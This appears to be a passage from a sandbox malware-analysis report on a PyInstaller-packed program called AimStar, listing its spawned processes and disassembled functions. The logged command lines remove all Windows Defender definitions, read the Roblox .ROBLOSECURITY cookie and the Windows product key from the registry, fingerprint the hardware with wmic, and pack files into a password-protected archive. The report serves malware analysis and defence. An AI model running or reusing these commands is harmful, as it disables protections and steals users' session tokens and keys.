Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"
Imagebase:	0x7ff6d8210000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	16:12:14
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1996, Parent PID: 7452

General

Target ID:	70
Start time:	16:12:14
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	16:12:14
Start date:	01/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6cb6b0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	16:12:14
Start date:	01/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1C05.tmp" "c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP"
Imagebase:	0x7ff653780000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	16:12:15
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8032, Parent PID: 8040

General

Target ID:	74
Start time:	16:12:15
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	16:12:15
Start date:	01/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6cb6b0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	16:12:15
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7580, Parent PID: 7784

General

Target ID:	77
Start time:	16:12:16
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	16:12:16
Start date:	01/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6cb6b0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	16:12:17
Start date:	01/01/2025
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff705360000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	16:12:17
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	16:12:17
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	16:12:17
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	16:12:18
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	16:12:18
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	16:12:18
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	16:12:26
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	16:12:26
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	16:12:26
Start date:	01/01/2025
Path:	C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *
Imagebase:	0x7ff713950000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	16:12:27
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	16:12:27
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	16:12:27
Start date:	01/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff6ab520000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	16:12:28
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	16:12:28
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	16:12:28
Start date:	01/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff6ab520000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	16:12:29
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7560, Parent PID: 8036

General

Target ID:	96
Start time:	16:12:29
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	16:12:29
Start date:	01/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff6ab520000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	16:12:30
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	16:12:30
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	16:12:30
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	16:12:32
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3364, Parent PID: 5652

General

Target ID:	102
Start time:	16:12:32
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	16:12:32
Start date:	01/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6ab520000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	16:12:32
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	16:12:32
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	16:12:33
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	24

Executed Functions

Function 00007FF710F48BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48C46

Part of subcall function 00007FF710F5A4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5A500

Part of subcall function 00007FF710F5878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F587F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48CD6
CreateProcessW.KERNELBASE ref: 00007FF710F48D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48D18

Part of subcall function 00007FF710F42C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42C9E
Part of subcall function 00007FF710F42C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42D63
Part of subcall function 00007FF710F42C50: MessageBoxW.USER32 ref: 00007FF710F42D99

RegisterClassW.USER32 ref: 00007FF710F48D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48D7B
CreateWindowExW.USER32 ref: 00007FF710F48DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48E05
PeekMessageW.USER32 ref: 00007FF710F48E29
TranslateMessage.USER32 ref: 00007FF710F48E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48E41
PeekMessageW.USER32 ref: 00007FF710F48E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F48FF4
GetExitCodeProcess.KERNELBASE ref: 00007FF710F49009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F49012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF710F43F7F), ref: 00007FF710F4901F

Strings

CreateProcessW, xrefs: 00007FF710F48D27
Failed to create child process!, xrefs: 00007FF710F48D20
PyInstaller Onefile Hidden Window, xrefs: 00007FF710F48D85
PyInstallerOnefileHiddenWindow, xrefs: 00007FF710F48D44

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 5a1935e71967dfe1f238cb7eb0dda82a2f9294084112d9e6eda8353df3499aa7
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: 51D17036A0CE8686E710AF74E8566ADB768FB84B68F800235DE5D437A5DF3CE149C710

Function 00007FF710F41000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to convert DLL search path!, xrefs: 00007FF710F43DDC
_PYI_SPLASH_IPC, xrefs: 00007FF710F43A23, 00007FF710F43EF5
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF710F43D35
VCRUNTIME140.dll, xrefs: 00007FF710F43DB1
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF710F43E0A
MEI, xrefs: 00007FF710F43933
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF710F43D12
pyi-contents-directory, xrefs: 00007FF710F43B8D
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF710F439DE
pkg, xrefs: 00007FF710F439BE
Py_GIL_DISABLED, xrefs: 00007FF710F43AF4
pyi-disable-windowed-traceback, xrefs: 00007FF710F43BB2
pyi-python-flag, xrefs: 00007FF710F43AD6
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF710F43BE8
Failed to load splash screen resources!, xrefs: 00007FF710F43E85
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF710F43EA6
_PYI_ARCHIVE_FILE, xrefs: 00007FF710F438D2, 00007FF710F439FF
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF710F43EBB
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF710F43882, 00007FF710F438AF
Could not create temporary directory!, xrefs: 00007FF710F43CBF
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF710F43A0B, 00007FF710F43CD4, 00007FF710F43F6B
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF710F43B32
Failed to remove temporary directory: %s, xrefs: 00007FF710F43FC3
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF710F43A17, 00007FF710F43A2F, 00007FF710F43A9B
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF710F43971
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF710F43C61
Failed to start splash screen!, xrefs: 00007FF710F43ED4
bye-runtime-tmpdir, xrefs: 00007FF710F43B68

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
Instruction ID: 1e33ddf3d0fd1846122f8d9e62ab027726d783c4b9834e4b14cc62656726858f
Opcode Fuzzy Hash: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
Instruction Fuzzy Hash: 6C327C31E0CE8691EA15BB2194567B9A6A9EF44760FC48032DE5D833D6EF2CF55DC320

Function 00007FF710F669D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF710F66708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F66749
Part of subcall function 00007FF710F66708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F667C7
Part of subcall function 00007FF710F66708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F66818

CreateFileW.KERNELBASE ref: 00007FF710F66ADA
CreateFileW.KERNEL32 ref: 00007FF710F66B2A
GetLastError.KERNEL32 ref: 00007FF710F66B5A
GetFileType.KERNELBASE ref: 00007FF710F66B6F
GetLastError.KERNEL32 ref: 00007FF710F66B79
CloseHandle.KERNEL32 ref: 00007FF710F66BAC
CloseHandle.KERNEL32 ref: 00007FF710F66D0F
CreateFileW.KERNEL32 ref: 00007FF710F66D44
GetLastError.KERNEL32 ref: 00007FF710F66D53

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
